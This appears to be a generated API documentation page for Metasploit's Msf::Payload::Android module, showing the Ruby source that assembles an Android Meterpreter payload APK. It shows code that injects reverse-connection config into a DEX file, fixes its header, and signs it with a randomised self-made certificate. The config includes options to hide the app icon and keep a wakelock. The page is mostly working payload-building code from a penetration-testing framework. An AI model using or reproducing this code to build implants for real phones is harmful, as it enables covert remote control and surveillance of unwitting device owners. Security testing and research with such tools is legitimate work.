Module: Msf::Payload::Android

Includes:
TransportConfig, UUID::Options
Included in:
MeterpreterLoader, ReverseHttp, ReverseTcp
Defined in:
lib/msf/core/payload/android.rb

Defined Under Namespace

Modules: MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp

Constant Summary

Constants included from Rex::Payloads::Meterpreter::UriChecksum

Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN

Instance Method Summary collapse

Methods included from UUID::Options

#generate_payload_uuid, #generate_uri_uuid_mode, #initialize, #record_payload_uuid, #record_payload_uuid_url

Methods included from Rex::Payloads::Meterpreter::UriChecksum

#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup

Methods included from TransportConfig

#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components

Methods included from Pingback::Options

#initialize

Instance Method Details

#fix_dex_header(dexfile) ⇒ Object

Fix the dex header checksum and signature source.android.com/tech/dalvik/dex-format.html


20
21
22
23
24
25
# File 'lib/msf/core/payload/android.rb', line 20

def fix_dex_header(dexfile)
  dexfile = dexfile.unpack('a8LH40a*')
  dexfile[2] = Digest::SHA1.hexdigest(dexfile[3])
  dexfile[1] = Zlib.adler32(dexfile[2..-1].pack('H40a*'))
  dexfile.pack('a8LH40a*')
end

#generate(opts = {}) ⇒ Object

Used by stagers to construct the payload jar file as a String


41
42
43
# File 'lib/msf/core/payload/android.rb', line 41

def generate(opts={})
  generate_jar(opts).pack
end

#generate_config(opts = {}) ⇒ Object


49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# File 'lib/msf/core/payload/android.rb', line 49

def generate_config(opts={})
  opts[:uuid] ||= generate_payload_uuid
  ds = opts[:datastore] || datastore

  config_opts = {
    ascii_str:  true,
    arch:       opts[:uuid].arch,
    expiration: ds['SessionExpirationTimeout'].to_i,
    uuid:       opts[:uuid],
    transports: opts[:transport_config] || [transport_config(opts)],
    stageless:  opts[:stageless] == true
  }

  config = Rex::Payloads::Meterpreter::Config.new(config_opts).to_b
  flags = 0
  flags |= 1 if opts[:stageless]
  flags |= 2 if ds['AndroidMeterpreterDebug']
  flags |= 4 if ds['AndroidWakelock']
  flags |= 8 if ds['AndroidHideAppIcon']
  config[0] = flags.chr
  config
end

#generate_default_stage(opts = {}) ⇒ Object


34
35
36
# File 'lib/msf/core/payload/android.rb', line 34

def generate_default_stage(opts={})
  ''
end

#generate_jar(opts = {}) ⇒ Object


115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
# File 'lib/msf/core/payload/android.rb', line 115

def generate_jar(opts={})
  config = generate_config(opts)
  if opts[:stageless]
    classes = MetasploitPayloads.read('android', 'meterpreter.dex')
    # Add stageless classname at offset 8000
    config += "\x00" * (8000 - config.size)
    config += 'com.metasploit.meterpreter.AndroidMeterpreter'
  else
    classes = MetasploitPayloads.read('android', 'apk', 'classes.dex')
  end

  config += "\x00" * (8195 - config.size)
  classes.gsub!("\xde\xad\xba\xad" + "\x00" * 8191, config)

  jar = Rex::Zip::Jar.new
  files = [
    [ "AndroidManifest.xml" ],
    [ "resources.arsc" ]
  ]
  jar.add_files(files, MetasploitPayloads.path("android", "apk"))
  jar.add_file("classes.dex", fix_dex_header(classes))
  jar.build_manifest

  sign_jar(jar)

  jar
end

#generate_stage(opts = {}) ⇒ Object

We could compile the .class files with dx here


30
31
32
# File 'lib/msf/core/payload/android.rb', line 30

def generate_stage(opts={})
  ''
end

#java_string(str) ⇒ Object


45
46
47
# File 'lib/msf/core/payload/android.rb', line 45

def java_string(str)
  [str.length].pack("N") + str
end

#sign_jar(jar) ⇒ Object


72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# File 'lib/msf/core/payload/android.rb', line 72

def sign_jar(jar)
  x509_name = OpenSSL::X509::Name.parse(
    "C=US/O=Android/CN=Android Debug"
  )

  key = signing_key

  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial = 1
  cert.subject = x509_name
  cert.issuer = x509_name
  cert.public_key = key.public_key

  # Some time within the last 3 years
  cert.not_before = Time.now - rand(3600 * 24 * 365 * 3)

  # From http://developer.android.com/tools/publishing/app-signing.html
  # """
  # A validity period of more than 25 years is recommended.
  #
  # If you plan to publish your application(s) on Google Play, note
  # that a validity period ending after 22 October 2033 is a
  # requirement. You cannot upload an application if it is signed
  # with a key whose validity expires before that date.
  # """
  #
  # 32-bit Ruby (and 64-bit Ruby on Windows) cannot deal with
  # certificate not_after times later than Jan 1st 2038, since long is 32-bit.
  # Set not_after to a random time 2~ years before the first bad date.
  #
  # FIXME: this will break again randomly starting in late 2033, hopefully
  # all 32-bit systems will be dead by then...
  #
  # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
  cert.not_after = Time.at(0x78045d81 + rand(0x7fffffff - 0x78045d81))

  # If this line is left out, signature verification fails on OSX.
  cert.sign(key, OpenSSL::Digest::SHA1.new)

  jar.sign(key, cert, [cert])
end

#signing_keyObject


12
13
14
# File 'lib/msf/core/payload/android.rb', line 12

def signing_key
  @@signing_key ||= OpenSSL::PKey::RSA.new(2048)
end